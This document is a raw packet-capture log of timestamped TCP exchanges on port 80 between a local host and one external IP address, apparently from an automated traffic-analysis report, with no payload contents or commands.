Oct 13, 2023 15:20:57.224756956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224930048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224967003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225059986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225095987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225157022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225189924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225193977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225224972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225225925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225260019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225347042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225380898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225433111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225452900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225469112 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225483894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225524902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225560904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225590944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225626945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225656986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225694895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225725889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225760937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225805044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225848913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225919962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.225956917 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.225989103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.226023912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.226111889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.226147890 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.226191044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.226228952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.226413012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.226444960 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.226469994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.226507902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.226538897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.226576090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.226805925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.226843119 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.226886988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.226932049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.226954937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.226990938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227035046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227072001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227077961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227114916 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227145910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227185011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227210045 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227226019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227269888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227308035 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227351904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227391958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227395058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227427006 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227448940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227483988 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227514982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227551937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227597952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227633953 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227662086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227696896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227725983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227744102 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227794886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227826118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227864981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227895975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227931976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.227957964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.227993965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228022099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228060961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228089094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228106976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228133917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228168964 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228178978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228214979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228245020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228285074 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228317976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228354931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228445053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228480101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228610992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228650093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228665113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228701115 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228744030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228781939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228790045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228825092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228842974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228879929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228897095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228929996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.228960991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.228995085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229026079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229062080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229106903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229145050 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229155064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229192019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229224920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229262114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229284048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229320049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229351044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229382992 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229432106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229466915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229492903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229531050 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229576111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229612112 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229617119 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229651928 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229748964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229784012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229827881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229857922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229862928 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229892969 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.229937077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.229973078 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230060101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230096102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230149984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230166912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230185986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230205059 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230231047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230267048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230292082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230325937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230357885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230393887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230446100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230482101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230525970 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230560064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230690002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230730057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.230937958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.230993986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231015921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231033087 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231060982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231091022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231096983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231127977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231168032 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231203079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231229067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231266022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231339931 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231374979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231389999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231431007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231447935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231465101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231482983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231506109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231569052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231604099 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231615067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231652021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231682062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231718063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231735945 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231753111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231774092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231787920 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231861115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231897116 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231928110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.231962919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.231987953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232003927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232023954 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232038975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232068062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232103109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232172966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232209921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232239962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232278109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232305050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232341051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232346058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232379913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232402086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232439041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232455969 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232491016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232512951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232549906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232579947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232614994 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232645988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232676029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232681036 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232716084 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232722044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232758045 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232841015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232877970 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232909918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232939959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.232947111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232976913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.232990980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233026981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233118057 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233153105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233160973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233197927 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233230114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233268023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233311892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233347893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233352900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233388901 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233421087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233462095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233468056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233506918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233580112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233617067 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233717918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233752966 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233782053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233817101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233890057 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233927011 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.233957052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.233994961 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234024048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234055042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234066010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234091997 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234141111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234179020 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234205961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234244108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234266996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234283924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234303951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234330893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234360933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234399080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234424114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234524965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234527111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234555960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234568119 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234596968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234626055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234664917 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234694004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234730959 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234761000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234796047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234814882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234849930 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234880924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234918118 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.234949112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.234985113 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235016108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235052109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235075951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235110998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235141993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235172033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235177040 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235209942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235239983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235274076 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235290051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235325098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235351086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235367060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235387087 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235402107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235529900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235568047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235601902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235632896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235635996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235670090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235702038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235738993 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235752106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235769033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235788107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235800982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235846996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235877991 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235909939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.235945940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.235971928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236006021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236035109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236068010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236085892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236120939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236124039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236159086 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236238956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236274004 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236301899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236336946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236367941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236413002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236491919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236526966 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236571074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236605883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236609936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236644030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236674070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236705065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236707926 CEST	49721	80	192.168.2.5	91.215.85.17
